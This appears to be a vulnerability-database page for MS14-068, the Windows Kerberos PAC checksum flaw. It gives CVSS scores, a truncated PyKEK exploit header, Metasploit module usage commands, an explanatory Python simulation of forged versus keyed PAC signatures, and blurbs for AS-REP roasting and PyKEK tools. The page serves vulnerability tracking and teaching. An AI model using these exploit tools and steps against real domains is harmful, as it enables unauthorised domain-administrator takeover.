Published: 18/11/2014 Updated: 12/10/2018
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
VMScore: 937
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

The Kerberos Key Distribution Center (KDC) in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka "Kerberos Checksum Vulnerability."


#!/usr/bin/python
# MS14-068 Exploit
#
# Author
# ------
# Sylvain Monne
# Contact : sylvain dot monne at solucom dot fr
# twitter.com/bidord

import sys, os
from random import getrandbits
from time import time, localtime, strftime

from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache
from kek.crypto import generate_subkey, ntlm_has ...

Metasploit Modules

MS14-068 Microsoft Kerberos Checksum Validation Vulnerability

This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem lies in the verification of the Privilege Attribute Certificate (PAC) carried in a Kerberos TGS request: a domain user may forge a PAC with arbitrary privileges, including Domain Administrator. This module requests a TGT with a forged PAC and exports it to an MIT Kerberos credential cache (ccache) file, which can then be loaded on a Windows system with the help of Mimikatz. It has been tested successfully on Windows 2008.

msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show actions
msf auxiliary(ms14_068_kerberos_checksum) > set ACTION <action-name>
msf auxiliary(ms14_068_kerberos_checksum) > show options
    ...show and set options...
msf auxiliary(ms14_068_kerberos_checksum) > run
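To show why the forged PAC described in the vulnerability summary and in the module description above is accepted, here is an added example; it is not code from this page, from the Metasploit module or from PyKEK. Before the fix the KDC recomputed the PAC server signature using whichever checksum type the PAC itself named, and RFC 3961 checksum type 7 (RSA-MD5) needs no key, so a domain user who does not hold the krbtgt key could still produce a valid signature over a PAC that lists the Domain Admins RID (512). The PAC body below is a constructed JSON stand-in for the NDR-encoded PAC_LOGON_INFO, the krbtgt key is a made-up constant, the keyed checksum follows the KERB_CHECKSUM_HMAC_MD5 construction from MS-PAC, and the two verifier functions are paraphrases of the pre- and post-patch behaviour, not Microsoft's code.

```python
import hashlib
import hmac
import json
import struct

# Checksum type identifiers (RFC 3961 / MS-PAC). PAC_SIGNATURE_DATA names the
# type, and the vulnerable KDC honoured whatever type it found there.
RSA_MD5 = 7                # unkeyed MD5: anyone can compute it
HMAC_MD5 = -138            # KERB_CHECKSUM_HMAC_MD5: keyed with the krbtgt RC4 key
KEY_USAGE_SERVER_SIG = 17  # MS-PAC key usage for the server signature

DOMAIN_USERS_RID = 513
DOMAIN_ADMINS_RID = 512


def pac_body(user, user_rid, group_rids):
    """Constructed stand-in for PAC_LOGON_INFO (the real buffer is NDR-encoded)."""
    return json.dumps({"user": user, "rid": user_rid,
                       "groups": sorted(group_rids)}).encode()


def pac_checksum(ctype, data, key=None):
    """Compute the PAC server signature for a given checksum type."""
    if ctype == RSA_MD5:
        return hashlib.md5(data).digest()  # no key involved at all
    if ctype == HMAC_MD5:
        if key is None:
            raise ValueError("HMAC-MD5 checksum needs the krbtgt key")
        # KERB_CHECKSUM_HMAC_MD5 as described in MS-PAC section 2.8.1
        ksign = hmac.new(key, b"signaturekey\x00", hashlib.md5).digest()
        inner = hashlib.md5(struct.pack("<I", KEY_USAGE_SERVER_SIG) + data).digest()
        return hmac.new(ksign, inner, hashlib.md5).digest()
    raise ValueError("unsupported checksum type %d" % ctype)


def sign_pac(body, ctype, key=None):
    """Attach a server signature of the requested type to a PAC body."""
    return {"body": body, "sig_type": ctype, "sig": pac_checksum(ctype, body, key)}


def verify_pre_ms14_068(pac, krbtgt_key):
    """Vulnerable behaviour: recompute whatever checksum type the PAC names."""
    expected = pac_checksum(pac["sig_type"], pac["body"], krbtgt_key)
    return hmac.compare_digest(expected, pac["sig"])


def verify_post_ms14_068(pac, krbtgt_key):
    """Fixed behaviour (paraphrased): unkeyed checksum types are rejected outright."""
    if pac["sig_type"] != HMAC_MD5:
        return False
    expected = pac_checksum(HMAC_MD5, pac["body"], krbtgt_key)
    return hmac.compare_digest(expected, pac["sig"])


def groups_granted(pac, krbtgt_key, verify):
    """Group RIDs a KDC using `verify` would copy into the issued ticket, or None."""
    if not verify(pac, krbtgt_key):
        return None
    return json.loads(pac["body"])["groups"]


def demo():
    # Constructed krbtgt RC4 key; the attacker never learns it.
    krbtgt_key = bytes.fromhex("1c3a9f0e7b2d4c6a8e1f0d3b5a7c9e2f")
    # Legitimate PAC issued by the KDC for a plain domain user.
    legit = sign_pac(pac_body("alice", 1105, [DOMAIN_USERS_RID]), HMAC_MD5, krbtgt_key)
    # Attacker's PAC: same user, Domain Admins added, signed with unkeyed MD5.
    forged = sign_pac(pac_body("alice", 1105, [DOMAIN_USERS_RID, DOMAIN_ADMINS_RID]), RSA_MD5)
    # Same forgery with a keyed checksum and a guessed key: rejected by both verifiers.
    guessed = sign_pac(forged["body"], HMAC_MD5, b"\x00" * 16)
    return {
        "legit_vuln": groups_granted(legit, krbtgt_key, verify_pre_ms14_068),
        "legit_fixed": groups_granted(legit, krbtgt_key, verify_post_ms14_068),
        "forged_vuln": groups_granted(forged, krbtgt_key, verify_pre_ms14_068),
        "forged_fixed": groups_granted(forged, krbtgt_key, verify_post_ms14_068),
        "guessed_vuln": groups_granted(guessed, krbtgt_key, verify_pre_ms14_068),
        "guessed_fixed": groups_granted(guessed, krbtgt_key, verify_post_ms14_068),
    }


if __name__ == "__main__":
    for name, groups in demo().items():
        print("%-13s %s" % (name, groups))
```

Running it shows the asymmetry that made the bug exploitable: the legitimate keyed PAC passes both verifiers, the MD5-signed forgery passes only the pre-patch verifier and comes back with RID 512 in its group list, and a forgery that names the keyed checksum type fails everywhere because the attacker cannot compute it without the krbtgt key.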

Github Repositories

as-rep-roast
Author: Jason Martinsen
Python code to execute an AS-REP Roasting attack. USE ONLY AGAINST AUTHORIZED TARGETS.
Usage:
    USAGE: as-rep-roast.py -u <userName>@<domainName> -d <domainControlerAddr>
Hashcat compatible output will be piped to screen and to the hashcat.out file.
This code is based on the code from the below project

Python Kerberos Exploitation Kit
PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data (still in development). For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324). More is coming.
Author: Sylvain Monné
Contact : sylvain dot monne at solucom dot fr ht

License
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
Version 3, August 2017
Everyone is permitted to copy and distribute verbatim or modified copies of this license document, and changing it is allowed as long as the name is changed.
DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
You just DO WHAT THE FUCK YOU WANT TO
